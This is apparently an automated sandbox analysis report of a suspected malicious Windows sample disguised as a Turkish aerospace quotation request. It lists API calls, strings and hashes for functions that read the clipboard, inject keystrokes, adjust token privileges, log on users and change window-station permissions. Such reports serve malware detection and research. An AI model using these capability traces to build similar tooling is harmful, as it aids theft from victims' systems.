                                                                                                                                    • Instruction Fuzzy Hash: 0AD06C3208010DBBDF028F84ED0AEDA3BAAFB48714F118000BE1856020C732E821AB90
                                                                                                                                    APIs
                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00181CBC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoParametersSystem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3098949447-0
                                                                                                                                    • Opcode ID: ef86fcaf090229cde430131220f0768e019b4680c29d57fa3065c8414fb4fd52
                                                                                                                                    • Instruction ID: 882427b2892d30f192b659df9d5d3021b20f3656351c31e3797660f4c76db6c3
                                                                                                                                    • Opcode Fuzzy Hash: ef86fcaf090229cde430131220f0768e019b4680c29d57fa3065c8414fb4fd52
                                                                                                                                    • Instruction Fuzzy Hash: 9BC0923A2C0304FFF2198B80BC5EF507765E358B02F948401F609B95F3D7B22820EA58
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 018A0A89
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                    • Instruction ID: 2d04515a863f774dae542dbcf69efa0dbe36c58982ec296ec03fd8e015fd8afc
                                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                    • Instruction Fuzzy Hash: DDE0E67494410DDFDB00DFB4D54969D7BB4EF04301F100261FD01D2280D7309E50DA62
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2
                                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0021961A
                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0021965B
                                                                                                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0021969F
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002196C9
                                                                                                                                    • SendMessageW.USER32 ref: 002196F2
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 0021978B
                                                                                                                                    • GetKeyState.USER32(00000009), ref: 00219798
                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002197AE
                                                                                                                                    • GetKeyState.USER32(00000010), ref: 002197B8
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002197E9
                                                                                                                                    • SendMessageW.USER32 ref: 00219810
                                                                                                                                    • SendMessageW.USER32(?,00001030,?,00217E95), ref: 00219918
                                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0021992E
                                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00219941
                                                                                                                                    • SetCapture.USER32(?), ref: 0021994A
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 002199AF
                                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002199BC
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002199D6
                                                                                                                                    • ReleaseCapture.USER32 ref: 002199E1
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00219A19
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00219A26
                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00219A80
                                                                                                                                    • SendMessageW.USER32 ref: 00219AAE
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00219AEB
                                                                                                                                    • SendMessageW.USER32 ref: 00219B1A
                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00219B3B
                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00219B4A
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00219B68
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00219B75
                                                                                                                                    • GetParent.USER32(?), ref: 00219B93
                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00219BFA
                                                                                                                                    • SendMessageW.USER32 ref: 00219C2B
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00219C84
                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00219CB4
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00219CDE
                                                                                                                                    • SendMessageW.USER32 ref: 00219D01
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00219D4E
                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00219D82
                                                                                                                                      • Part of subcall function 00199944: GetWindowLongW.USER32(?,000000EB), ref: 00199952
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00219E05
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                                    • String ID: @GUI_DRAGID$F$p#%
                                                                                                                                    • API String ID: 3429851547-2685227466
                                                                                                                                    • Opcode ID: 57c708d8bccdc76bba98d124f6c9097d2b45c6d63cc3ca7b2aa77cc1ceb1fe5e
                                                                                                                                    • Instruction ID: b33aa9234e2c146ce18c0f2dd27bdf5d4115b4cc3e5014897facfb7d2cd6f261
                                                                                                                                    • Opcode Fuzzy Hash: 57c708d8bccdc76bba98d124f6c9097d2b45c6d63cc3ca7b2aa77cc1ceb1fe5e
                                                                                                                                    • Instruction Fuzzy Hash: 4642AC74614241AFD724CF28DC58BEABBE9FFA9310F104629F599872A1D731E8A0CF51
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 002148F3
                                                                                                                                    • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00214908
                                                                                                                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00214927
                                                                                                                                    • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0021494B
                                                                                                                                    • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0021495C
                                                                                                                                    • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0021497B
                                                                                                                                    • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 002149AE
                                                                                                                                    • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 002149D4
                                                                                                                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00214A0F
                                                                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00214A56
                                                                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00214A7E
                                                                                                                                    • IsMenu.USER32(?), ref: 00214A97
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00214AF2
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00214B20
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00214B94
                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00214BE3
                                                                                                                                    • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00214C82
                                                                                                                                    • wsprintfW.USER32 ref: 00214CAE
                                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00214CC9
                                                                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00214CF1
                                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00214D13
                                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00214D33
                                                                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00214D5A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                                    • API String ID: 4054740463-328681919
                                                                                                                                    • Opcode ID: 9c5e3a9334f307c3c180e708e4eb2ea8b6a46dbcfa2c88ba136481727b018f96
                                                                                                                                    • Instruction ID: 75f8167378905b8ee438f48c97c4924b3dfa463c1c7ae6cd7955a7406df5e73c
                                                                                                                                    • Opcode Fuzzy Hash: 9c5e3a9334f307c3c180e708e4eb2ea8b6a46dbcfa2c88ba136481727b018f96
                                                                                                                                    • Instruction Fuzzy Hash: F7122171610245ABEB28AF24DC49FEE7BF8EFA5310F104129F519EB2E0DB749991CB50
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0019F998
                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001DF474
                                                                                                                                    • IsIconic.USER32(00000000), ref: 001DF47D
                                                                                                                                    • ShowWindow.USER32(00000000,00000009), ref: 001DF48A
                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 001DF494
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001DF4AA
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 001DF4B1
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001DF4BD
                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 001DF4CE
                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 001DF4D6
                                                                                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 001DF4DE
                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 001DF4E1
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001DF4F6
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 001DF501
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001DF50B
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 001DF510
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001DF519
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 001DF51E
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001DF528
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 001DF52D
                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 001DF530
                                                                                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 001DF557
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                                    • Opcode ID: a648e58fe3f4797ca218a5d71fdcff33ec4ddd94614f717b7e7b20af96581667
                                                                                                                                    • Instruction ID: 42bd90ab60db82607659074614b9f4f4dbec35419bf73017048dff55867f4787
                                                                                                                                    • Opcode Fuzzy Hash: a648e58fe3f4797ca218a5d71fdcff33ec4ddd94614f717b7e7b20af96581667
                                                                                                                                    • Instruction Fuzzy Hash: C0316575A80318BBEB216BB56C4DFBF7E6DEB44B50F20402AF601F61D1CBB05D01AA60
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001E170D
                                                                                                                                      • Part of subcall function 001E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001E173A
                                                                                                                                      • Part of subcall function 001E16C3: GetLastError.KERNEL32 ref: 001E174A
                                                                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 001E1286
                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001E12A8
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 001E12B9
                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001E12D1
                                                                                                                                    • GetProcessWindowStation.USER32 ref: 001E12EA
                                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 001E12F4
                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001E1310
                                                                                                                                      • Part of subcall function 001E10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001E11FC), ref: 001E10D4
                                                                                                                                      • Part of subcall function 001E10BF: CloseHandle.KERNEL32(?,?,001E11FC), ref: 001E10E9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                    • String ID: $default$winsta0$Z$
                                                                                                                                    • API String ID: 22674027-3486118733
                                                                                                                                    • Opcode ID: a65c03b884e72cef7e73f4f7fb7ceb43cdb3ed331067b2531058aa0108e4d6d1
                                                                                                                                    • Instruction ID: 5b41f36e6be59e8016134831177d55236d98c89434b065adaa18b1d181ede110
                                                                                                                                    • Opcode Fuzzy Hash: a65c03b884e72cef7e73f4f7fb7ceb43cdb3ed331067b2531058aa0108e4d6d1
                                                                                                                                    • Instruction Fuzzy Hash: 8B81AD71940689BFDF219FA5DC49FEE7BB9FF08704F248129F911A62A0CB708955CB60
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001E1114
                                                                                                                                      • Part of subcall function 001E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E1120
                                                                                                                                      • Part of subcall function 001E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E112F
                                                                                                                                      • Part of subcall function 001E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E1136
                                                                                                                                      • Part of subcall function 001E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001E114D
                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001E0BCC
                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001E0C00
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 001E0C17
                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 001E0C51
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001E0C6D
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 001E0C84
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 001E0C8C
                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 001E0C93
                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001E0CB4
                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 001E0CBB
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001E0CEA
                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001E0D0C
                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001E0D1E
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E0D45
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 001E0D4C
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E0D55
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 001E0D5C
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E0D65
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 001E0D6C
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 001E0D78
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 001E0D7F
                                                                                                                                      • Part of subcall function 001E1193: GetProcessHeap.KERNEL32(00000008,001E0BB1,?,00000000,?,001E0BB1,?), ref: 001E11A1
                                                                                                                                      • Part of subcall function 001E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,001E0BB1,?), ref: 001E11A8
                                                                                                                                      • Part of subcall function 001E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001E0BB1,?), ref: 001E11B7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                    • Opcode ID: ec24d56429d9e2fb8b1f697b03cf0f581ca646c7b589fabfff912f46760fbbe5
                                                                                                                                    • Instruction ID: 655e5ba9c5cb45295ece50a14e34ecbe604112b7cfb674f38edc6f36e0304c72
                                                                                                                                    • Opcode Fuzzy Hash: ec24d56429d9e2fb8b1f697b03cf0f581ca646c7b589fabfff912f46760fbbe5
                                                                                                                                    • Instruction Fuzzy Hash: 6571AC7590024AEBDF11DFE5EC48BEEBBB8BF18300F148125E904A7190DBB4AA41CB60
                                                                                                                                    APIs
                                                                                                                                    • OpenClipboard.USER32(0021CC08), ref: 001FEB29
                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 001FEB37
                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 001FEB43
                                                                                                                                    • CloseClipboard.USER32 ref: 001FEB4F
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 001FEB87
                                                                                                                                    • CloseClipboard.USER32 ref: 001FEB91
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 001FEBBC
                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 001FEBC9
                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 001FEBD1
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 001FEBE2
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 001FEC22
                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 001FEC38
                                                                                                                                    • GetClipboardData.USER32(0000000F), ref: 001FEC44
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 001FEC55
                                                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 001FEC77
                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001FEC94
                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001FECD2
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 001FECF3
                                                                                                                                    • CountClipboardFormats.USER32 ref: 001FED14
                                                                                                                                    • CloseClipboard.USER32 ref: 001FED59
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 420908878-0
                                                                                                                                    • Opcode ID: d895eb6f866c9646e8cf8b47b046eccc307511e6a75468af550e7b45307bfde4
                                                                                                                                    • Instruction ID: 449a2a36b45470a3b6d8adbbb8ab31a5a02c45a67713eff555c9c2ad66d80027
                                                                                                                                    • Opcode Fuzzy Hash: d895eb6f866c9646e8cf8b47b046eccc307511e6a75468af550e7b45307bfde4
                                                                                                                                    • Instruction Fuzzy Hash: AF61DF38244305AFD300EF64E888F7A77E8AF94714F288559F956972A2CF31DE05CB62
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001F69BE
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 001F6A12
                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001F6A4E
                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001F6A75
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 001F6AB2
                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 001F6ADF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                    • API String ID: 3830820486-3289030164
                                                                                                                                    • Opcode ID: ed999fd03a4f2675bde4b4de27a106cd53a0727e50fa65d9aa2146178c3f172e
                                                                                                                                    • Instruction ID: e202edfe48a0fe0c268dcd550ae0aeb6829d18c195d2d622c86c724818c66e67
                                                                                                                                    • Opcode Fuzzy Hash: ed999fd03a4f2675bde4b4de27a106cd53a0727e50fa65d9aa2146178c3f172e
                                                                                                                                    • Instruction Fuzzy Hash: E7D16CB2508304AEC714EBA4D885EBBB7ECAFA9704F04491DF685D7191EB74DA04CB62
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 001F9663
                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 001F96A1
                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 001F96BB
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 001F96D3
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 001F96DE
